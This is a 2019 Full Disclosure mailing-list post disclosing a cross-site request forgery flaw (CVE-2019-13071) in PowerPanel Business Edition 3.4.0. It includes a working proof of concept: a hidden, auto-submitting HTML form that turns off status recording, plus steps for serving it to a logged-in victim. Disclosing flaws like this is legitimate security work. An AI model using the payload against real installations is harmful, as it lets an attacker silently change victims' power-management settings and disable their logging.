'[FD] PowerPanel Business Edition 3.4.0 - Cross Site Request Forgery'

[prev in list] [next in list] [prev in thread] [next in thread] 

List:       full-disclosure
Subject:    [FD] PowerPanel Business Edition 3.4.0 - Cross Site Request Forgery
From:       Joey Lane via Fulldisclosure <fulldisclosure () seclists ! org>
Date:       2019-07-09 22:19:27
Message-ID: CAP5CuhoK4eNSFWD5DV-yzTQHE4r7ORV3t0REB5afv5fMZh8OVA () mail ! gmail ! com
[Download RAW message or body]

# Exploit Title: PowerPanel Business Edition 3.4.0 - Cross Site Request
Forgery
# Date: 7/9/2019
# Exploit Author: Joey Lane
# Vendor Homepage: https://www.cyberpowersystems.com
# Version: 3.4.0
# Tested on: Ubuntu 16.04
# CVE : CVE-2019-13071
# Reported to vendor on 5/25/2019, no acknowledgement.

The Agent/Center component of PowerPanel Business Edition is vulnerable to
cross site request forgery. This can be exploited by tricking an
authenticated user into visiting a web page controlled by a malicious
person.

The following example uses CSRF to disable Status Recording under the Logs
/ Settings page.  Create a file named 'csrf.html' on a local workstation
with the following contents:

<iframe style="display:none" name="csrf-frame"></iframe>
<div style="display: none;">
<form method='POST' action='http://(A VALID HOST
NAME):3052/agent/log_options' target="csrf-frame" id="csrf-form">
  <input type='hidden' name='value(recordingEnable)' value='no'>
  <input type='hidden' name='value(recordingInterval)' value='10'>
  <input type='hidden' name='value(periodToRemoveRecord)' value='2'>
  <input type='hidden' name='value(clearAllStatusLogs)' value='no'>
  <input type='hidden' name='value(type)' value='records'>
  <input type='hidden' name='value(action)' value='Apply'>
  <input type='hidden' name='value(button)' value='Apply'>
  <input type='submit' value='submit'>
</form>
</div>
<script>document.getElementById("csrf-form").submit()</script>

Serve the file using python or any other web server:

python -m SimpleHTTPServer 8000

Visit the local page in a browser while logged into PowerPanel Business
Edition:

http://localhost:8000/csrf.html

The hidden form is submitted in the background, and will disable Status
Recording.  This could be adapted to exploit other forms in the web
application as well.

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
[prev in list] [next in list] [prev in thread] [next in thread] 